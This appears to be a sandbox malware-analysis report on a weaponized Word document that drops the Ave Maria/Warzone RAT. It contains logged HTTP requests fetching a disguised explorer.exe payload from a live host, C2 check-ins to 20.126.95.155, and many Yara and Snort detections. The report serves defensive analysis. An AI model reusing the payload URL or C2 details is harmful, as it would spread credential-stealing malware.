Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80

Source: global traffic	DNS query: name: login.929389.ankura.us
Source: global traffic	DNS query: name: login.929389.ankura.us

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 159.223.2.212:80

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic	Snort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic	Snort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49173 -> 20.126.95.155:7800

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 20.126.95.155

Source: global traffic

HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive

Source: Joe Sandbox View	ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View	ASN Name: CELANESE-US CELANESE-US

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 20.126.95.155:7800

Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: httP://login.929
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: httP://login.929389.ank
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: httP://login.929389.ankura.us/Aw
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exePE
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://login.929389.ankura.us
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.926952704.000000001B39C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: login.929389.ankura.us

Source: global traffic	HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.126.95.155

Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud

Yara detected AveMaria stealer

Source: Yara match	File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE	Matched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
